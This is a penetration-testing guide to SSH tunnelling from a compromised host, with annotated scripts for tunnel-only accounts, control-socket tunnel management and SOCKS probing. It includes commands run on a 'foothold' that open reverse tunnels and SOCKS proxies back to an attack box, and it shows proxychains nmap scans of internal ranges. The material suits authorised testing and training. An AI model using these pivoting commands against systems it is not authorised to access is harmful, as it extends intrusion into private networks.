
SSH Port Forwarding

Security Considerations

Reverse Tunneling

  • This requires you to establish an SSH connection from the foothold back to your attack box, so a credential or private key for your attack box ends up on a host you do not control
  • You want to mitigate any potential for that authentication to be used against you: if the key or password is recovered from the foothold, it should only buy a tunnel-only account with no shell, no forwarding beyond what you expect, and only from the source addresses you expect

Public Key Authentication

  • Say you have a throwaway account named junkuser on the attack box for the purpose of tunneling
  • The SSH public key goes in /home/junkuser/.ssh/authorized_keys; the private key is the half that travels to the foothold
  • With public key authentication, you can prefix the key in authorized_keys with options that restrict what that key may do (see the AUTHORIZED_KEYS FILE FORMAT section of sshd(8))

Example: authorized_keys

command="echo 'This account is for port forwarding only'",from="192.168.1.11,192.168.1.12",no-user-rc,no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa public-key-here

  • command= replaces whatever the client asks to run, so a login with this key never gets a shell; a client connecting with -N requests no session at all, so the forwards still work
  • from= limits the key to the foothold's source addresses; a stolen key is useless from anywhere else
  • no-pty, no-user-rc, no-agent-forwarding and no-X11-forwarding remove the remaining ways to turn the login into interactive access
  • Newer OpenSSH (7.2+) has the restrict option, which disables everything and lets you re-enable only port-forwarding; 7.8+ adds permitlisten="127.0.0.1:port" so the key can bind only the one port your reverse tunnel uses

Password Authentication

  • Public key authentication is the better choice: a key cannot be brute-forced or guessed, it can carry its own restrictions in authorized_keys, and it is revoked by deleting one line
  • If you must use passwords, add a Match block to /etc/ssh/sshd_config on the attack box to constrain the user
    • You can combine public key options with a Match block as well, to create a more constrained configuration; the Match block still holds if the authorized_keys options are edited away
  • Say you have a throwaway user named junkuser: append the Match block at the bottom of the config file, because every line after a Match line until the next Match line belongs to that block

Example: sshd_config

Match User junkuser
    PermitRootLogin no
    PermitTTY no
    PermitUserRC no
    ForceCommand echo 'This account is for port forwarding only'
    PasswordAuthentication yes
    PermitEmptyPasswords no
    MaxAuthTries 2
    AllowAgentForwarding no
    X11Forwarding no
    X11UseLocalhost no
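The following script ties the two sections above together for the reverse-tunnel case. It is an added example, not code from the original page: it builds a locked-down authorized_keys entry and a matching Match block for a throwaway account on the attack box, and optionally creates the account. The account name junkuser, the foothold addresses 192.168.1.11 and 192.168.1.12 and the listen port 43306 are assumptions carried over from the examples above; the function names, the /tmp key path and the `systemctl reload ssh` service name are assumptions too (the service is called sshd on some distributions). It goes beyond the page's options by using restrict (OpenSSH 7.2+) and permitlisten (7.8+), and by enforcing the same limits server-side with AllowTcpForwarding remote, PermitListen and PermitOpen none.

```shell
#!/bin/sh
# Added example: build a tunnel-only account on the attack box for reverse
# tunnels (-R) coming back from a foothold.  Names, addresses, ports and the
# service name below are assumptions, not values from the original page.
set -eu

# Print one authorized_keys line that only permits a remote forward back to
# 127.0.0.1:$3 from the source addresses in $2, for the public key in $1.
#   restrict          disable pty, agent/X11 forwarding, user rc, tunnels, ...
#   port-forwarding   re-enable TCP forwarding only
#   permitlisten      the only listen address/port an -R forward may request
#   from              client source addresses allowed to use this key
#   command           what runs if a session is requested anyway
authorized_keys_line() {
    pubkey=$1; from=$2; port=$3
    printf 'restrict,port-forwarding,permitlisten="127.0.0.1:%s",from="%s",command="echo tunnel only" %s\n' \
        "$port" "$from" "$pubkey"
}

# Print an sshd_config Match block that enforces the same limits server-side,
# so the restrictions hold even if someone edits the key options away.
#   AllowTcpForwarding remote   only -R style forwards (remote from the ssh(1) view)
#   PermitListen                the one bind address/port an -R may request
#   PermitOpen none             no -L / -D through this account
#   GatewayPorts no             listeners stay on loopback
match_block() {
    user=$1; port=$2
    cat <<EOF
Match User $user
    AllowTcpForwarding remote
    PermitListen 127.0.0.1:$port
    PermitOpen none
    GatewayPorts no
    PasswordAuthentication no
    PermitTTY no
    PermitUserRC no
    AllowAgentForwarding no
    X11Forwarding no
    ForceCommand echo tunnel only
EOF
}

# Create the account and install both pieces.  Run as root on the attack box;
# the key pair is generated here and the private half is what you carry to
# the foothold.  Not invoked automatically so the helpers above can be sourced.
install_tunnel_user() {
    user=$1; from=$2; port=$3
    useradd -m -s /bin/sh -p '*' "$user"        # '*' = no usable password, account not locked
    ssh-keygen -t ed25519 -N '' -f "/tmp/$user.key" -C "$user tunnel key"
    install -d -m 700 -o "$user" -g "$user" "/home/$user/.ssh"
    authorized_keys_line "$(cat "/tmp/$user.key.pub")" "$from" "$port" \
        > "/home/$user/.ssh/authorized_keys"
    chown "$user:$user" "/home/$user/.ssh/authorized_keys"
    chmod 600 "/home/$user/.ssh/authorized_keys"
    match_block "$user" "$port" >> /etc/ssh/sshd_config   # Match blocks must come last
    sshd -t && systemctl reload ssh                       # syntax check, then reload
    # Show the options sshd will actually apply to this user before trusting it.
    sshd -T -C "user=$user,addr=${from%%,*},host=foothold" \
        | grep -Ei 'tcpforwarding|permitlisten|permitopen|permittty'
}

# Example invocation (assumed values):
#   install_tunnel_user junkuser 192.168.1.11,192.168.1.12 43306
```

The `sshd -T -C` check at the end is the part worth keeping even if you build the account by hand: it prints the effective configuration for that user from that address, so a typo in the Match criteria shows up before the key is on a hostile box.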



Individual Port Forwarding

  • A service on a compromised host is listening on 127.0.0.1 only, so it cannot be reached from the network
  • Open a port on the attack box and forward whatever connects to it through the SSH session to that remote port

Local Port to Remote Port

		Step 1. Establish SSH Tunnel from Local
							
[Attack Box] [+]==========[SSH]========>> [Remote]

127.0.0.1:[port]					127.0.0.1:[port]
		   [+]									 ^
        	|____________________________________|
        
        Step 2. Forward Local Port to Remote Port
# Generic Command
# ---------------
#   -f   go to background once authenticated
#   -N   run no remote command, just hold the forwards open
#   -L   attack-ip:attack-port:remote-ip:remote-port; remote-ip is resolved from the target's side,
#        so 127.0.0.1 there means the target's own loopback
#   The two -o options skip host key verification entirely; acceptable for a target you cannot pin
#   in advance, but it also means a MITM between you and the target goes unnoticed
    # Password Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -L attack-ip:attack-port:remote-ip:remote-port user@target

    # Private Key Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -L attack-ip:attack-port:remote-ip:remote-port -i /path/to/private-key user@target

    # Multiple Port Forward (as many -L as needed)
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -L attack-ip:attack-port:remote-ip:remote-port -L attack-ip:attack-port:remote-ip:remote-port user@target


# Example Command
# ---------------
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -L 127.0.0.1:43306:127.0.0.1:3306 user@target
    # [+] Open port 43306 on 127.0.0.1 attack box
    # [+] Forward to 127.0.0.1:3306 on remote via SSH tunnel


Reverse Local Port to Remote Port

		Step 1. Establish SSH Tunnel from Remote

[Attack Box] <<=========[SSH]========[+] [Remote]

127.0.0.1:[port]					127.0.0.1:[port]
		   [+]									 ^
        	|____________________________________|
        
    Step 2. Reverse Forward Attack Box Port to Remote
# Generic Command
# ---------------
#   Run on the foothold; the SSH server here is your attack box
#   -R   attack-ip:attack-port:local-ip:local-port; attack-ip:attack-port is bound by sshd on the attack box,
#        local-ip:local-port is resolved from the foothold's side
#   Binding attack-ip to anything other than loopback requires GatewayPorts on the attack box's sshd
#   Since the server is your own box, you can pin its host key instead of disabling checking as below
    # Password Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port:local-ip:local-port user@attack-box-ip

    # Private Key Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port:local-ip:local-port -i /path/to/private/key user@attack-box-ip

    # Multiple Port Forward (as many -R as needed)
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port:local-ip:local-port -R attack-ip:attack-port:local-ip:local-port user@attack-box-ip


# Example Command
# ---------------
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R 127.0.0.1:43306:127.0.0.1:3306 user@attack-box-ip
    # [+] Open port 43306 on 127.0.0.1 attack box
    # [+] Reverse forward to 127.0.0.1:3306 on remote via SSH tunnel
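Both procedures above background ssh with -f -N, which leaves you without a handle on the tunnel and, worse, reports success even when the listen port could not be bound. The helper below is an added example, not code from the original page, that wraps the same -L and -R invocations in an ssh control socket (-M / -S / -O, standard ssh(1) options) so a tunnel can be checked and torn down by name, validates the forward spec before calling ssh, and adds ExitOnForwardFailure so a failed bind fails loudly. The function names, the TUN_DIR socket directory and the hostnames in the usage comments are assumptions; StrictHostKeyChecking=accept-new needs an OpenSSH 7.6+ client.

```shell
#!/bin/sh
# Added example: manage -L / -R tunnels through an ssh control socket so a
# backgrounded (-f -N) tunnel can be checked and torn down by name instead of
# hunting for its PID.  Socket directory and hostnames are assumptions.
set -eu

TUN_DIR=${TUN_DIR:-/tmp/tun}     # one control socket per tunnel name

# Validate a forward spec of the form bind:port:host:port (what -L and -R take)
# before handing it to ssh; IPv4 addresses and hostnames only.  A malformed
# spec otherwise only surfaces as "Bad local forwarding specification".
check_spec() {
    spec=$1
    IFS=: read -r bind lport host rport <<EOF
$spec
EOF
    [ -n "$bind" ] && [ -n "$host" ] || return 1
    for p in "$lport" "$rport"; do
        case $p in ''|*[!0-9]*) return 1 ;; esac
        [ "$p" -ge 1 ] && [ "$p" -le 65535 ] || return 1
    done
}

# Options every tunnel gets:
#   ExitOnForwardFailure   with -f, ssh otherwise backgrounds and exits 0 even
#                          when the listen port could not be bound
#   ServerAliveInterval    notice a dead path instead of a silently hung tunnel
#   StrictHostKeyChecking=accept-new   pin the host key on first contact; the
#                          page's "no" plus /dev/null disables checking entirely
ssh_opts() {
    printf '%s' "-o ExitOnForwardFailure=yes -o ServerAliveInterval=15 -o ServerAliveCountMax=3 -o StrictHostKeyChecking=accept-new -o UserKnownHostsFile=$TUN_DIR/known_hosts"
}

# tun_up NAME {-L|-R} SPEC [SPEC...] -- [ssh args...] DEST
tun_up() {
    name=$1; kind=$2; shift 2
    [ "$kind" = -L ] || [ "$kind" = -R ] || { echo "kind must be -L or -R" >&2; return 1; }
    mkdir -p "$TUN_DIR"; chmod 700 "$TUN_DIR"
    fwd=""
    while [ $# -gt 0 ] && [ "$1" != "--" ]; do
        check_spec "$1" || { echo "bad forward spec: $1" >&2; return 1; }
        fwd="$fwd $kind $1"; shift
    done
    [ $# -gt 0 ] || { echo "missing -- DEST" >&2; return 1; }
    shift
    # -M: this process is the control master; -S: its socket; -f -N: background, no command
    # shellcheck disable=SC2046,SC2086
    ssh $(ssh_opts) -M -S "$TUN_DIR/$name.sock" -f -N $fwd "$@"
}

# The host argument after -O is required by ssh but unused when the socket exists.
tun_check() { ssh -S "$TUN_DIR/$1.sock" -O check dummy; }    # exit 0 while the master is alive
tun_down()  { ssh -S "$TUN_DIR/$1.sock" -O exit  dummy; }    # closes master and every forward

# Usage (hostnames are placeholders):
#   tun_up db   -L 127.0.0.1:43306:127.0.0.1:3306 -- user@target                      # local forward
#   tun_up back -R 127.0.0.1:43306:127.0.0.1:3306 -- -i /path/to/key junkuser@attack-box-ip   # reverse, from the foothold
#   tun_check db && tun_down db
```

For the reverse case the known_hosts file under TUN_DIR is worth pre-seeding with your attack box's host key before you copy the script to the foothold, so the first connection is pinned rather than merely recorded.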



Forward Dynamic SOCKS Proxy

  • Create a SOCKS proxy on the attack box that routes traffic from SOCKS-aware tools (curl --socks5-hostname, proxychains, nmap --proxies) through the compromised host
  • The compromised host is the proxy's exit: every connection leaves from its interface, so it can reach anything the host itself can route to. SOCKS is not transparent; tools that do not speak it must be wrapped with something like proxychains, and only TCP is carried
        Step 1. Establish SSH Tunnel from Local
																		   ____________  
                                                                          |		 	   |
[Attack Box] [+]=========[SSH]========>> [Remote] ===[Proxy Traffic]==>>  |	  Remote   |
                                            /\                            | Network(s) |
127.0.0.1:[port]							||							  |            |
		   [+]								||							   ------------
		   ||								||
           ||_______________________________||
           |	      Proxy Traffic			 |
           |_________________________________|
           
		Step 2. Create a SOCKS Proxy
				with Remote Acting as Jump Host
# Generic Command
# ---------------
#   -D attack-ip:attack-port opens a SOCKS 4/5 listener on the attack box; no destination is given
#   because each SOCKS client names its own target and the ssh server on the remote connects to it
    # Password Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D attack-ip:attack-port user@target

    # Private Key Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D attack-ip:attack-port -i /path/to/private-key user@target


# Example Command
# ---------------
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D 127.0.0.1:50001 user@target
    # [+] Open SOCKS port 50001 on 127.0.0.1 attack box
    # [+] SOCKS-aware clients pointed at it can reach any host routable from the target



Reverse Dynamic SOCKS Proxy

  • REQUIRES OpenSSH 7.6 or newer on the client side, i.e. the ssh binary on the compromised host, because it is the client that does the SOCKS proxying and the outbound connects; the sshd on the attack box only provides the listener
  • Creates a SOCKS 4/5 proxy on the attack box that routes traffic from SOCKS-aware tools on the attack box (Kali) through the tunnel on the specified port
  • Convenient when you cannot SSH into the compromised host (no reachable sshd, or no credential for it) but it can open an outbound SSH connection to you
  • Create a throwaway account on the attack box, generate an SSH key pair, lock the key down as described under Security Considerations, and transfer the private key to the target
  • Run on the target
        Step 1. Establish SSH Tunnel from Remote
																		  ____________  
                                                                         |		 	  |
[Attack Box] <<========[SSH]=========[+] [Remote] ===[Proxy Traffic]==>> |	 Remote	  |
                                            /\                           | Network(s) |
127.0.0.1:[port]							||							 |            |
		   [+]								||							  ------------
		   ||								||
           ||_______________________________||
           |	      Proxy Traffic			 |
           |_________________________________|
           
		Step 2. Create a Reverse SOCKS Proxy
				with Remote Acting as Jump Host
# Generic Command
# ---------------
#   Run on the foothold; -R with only attack-ip:attack-port and no destination asks sshd on the
#   attack box to open a listener there and turns this ssh client into the SOCKS 4/5 proxy behind it
#   Binding attack-ip to anything other than loopback requires GatewayPorts on the attack box's sshd
    # Password Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port user@attack-box-ip

    # Private Key Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port -i /path/to/private-key user@attack-box-ip


# Example Command
# ---------------
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R 127.0.0.1:50001 user@attack-box-ip
    # [+] Open SOCKS port 50001 on 127.0.0.1 attack box
    # [+] SOCKS-aware clients pointed at it can reach any host routable from the target
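Whichever direction the proxy was built in, the attack box ends up with a SOCKS listener on 127.0.0.1:50001 and the question is whether it is actually answering and how to push tools through it. The script below is an added example, not code from the original page, serving both the forward (-D) and reverse (-R) SOCKS sections above: it sends a SOCKS5 greeting to the listener and classifies the two-byte reply, and writes a proxychains4 config that resolves DNS through the proxy. The proxy address, the placeholder targets in the usage comments and the function names are assumptions; the probe uses bash's /dev/tcp so it needs bash on the attack box.

```shell
#!/bin/bash
# Added example: confirm that a -D / reverse -R SOCKS listener on the attack
# box answers a SOCKS5 greeting before pointing tools at it, then drive
# SOCKS-aware tools through it.  Proxy address and targets are assumptions.
set -eu

PROXY_HOST=${PROXY_HOST:-127.0.0.1}
PROXY_PORT=${PROXY_PORT:-50001}

# Interpret the 2-byte SOCKS5 method-selection reply (given as 4 hex digits):
#   05 00  version 5, "no authentication" accepted  -> usable (what ssh sends)
#   05 ff  version 5, no acceptable method          -> proxy wants auth we did not offer
#   anything else: not a SOCKS5 speaker on that port (e.g. a plain -L forward, or HTTP)
socks5_reply_status() {
    case $1 in
        0500) echo ok ;;
        05ff) echo no-method ;;
        05??) echo unexpected-method ;;
        *)    echo not-socks5 ;;
    esac
}

# Send a SOCKS5 greeting (version 5, one method offered: 0x00 no-auth) and
# read the reply.  Uses bash's /dev/tcp so it needs no netcat on the attack box.
socks5_probe() {
    host=$1; port=$2
    exec 3<>"/dev/tcp/$host/$port" || return 1
    printf '\005\001\000' >&3
    reply=$(dd bs=1 count=2 <&3 2>/dev/null | od -An -tx1 | tr -d ' \n')
    exec 3<&- 3>&-
    socks5_reply_status "$reply"
}

# Write a proxychains4 config that chains only this proxy and resolves names
# through it (proxy_dns), so DNS lookups for internal hosts do not leak from
# the attack box's own resolver.
proxychains_conf() {
    cat <<EOF
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 $1 $2
EOF
}

# Usage (targets are placeholders):
#   [ "$(socks5_probe "$PROXY_HOST" "$PROXY_PORT")" = ok ] || echo "proxy not ready" >&2
#   curl --socks5-hostname "$PROXY_HOST:$PROXY_PORT" http://10.10.10.5/      # name resolved on the far side
#   proxychains_conf "$PROXY_HOST" "$PROXY_PORT" > /tmp/pc.conf
#   proxychains4 -f /tmp/pc.conf nmap -sT -Pn -n 10.10.10.0/24                # full-connect scans only: SOCKS carries TCP, no raw packets or ICMP
```

The probe distinguishes the common failure modes: `not-socks5` usually means the port is a plain port forward rather than a -D listener, and `no-method` means something other than ssh is answering, since ssh's built-in SOCKS server accepts the no-auth method.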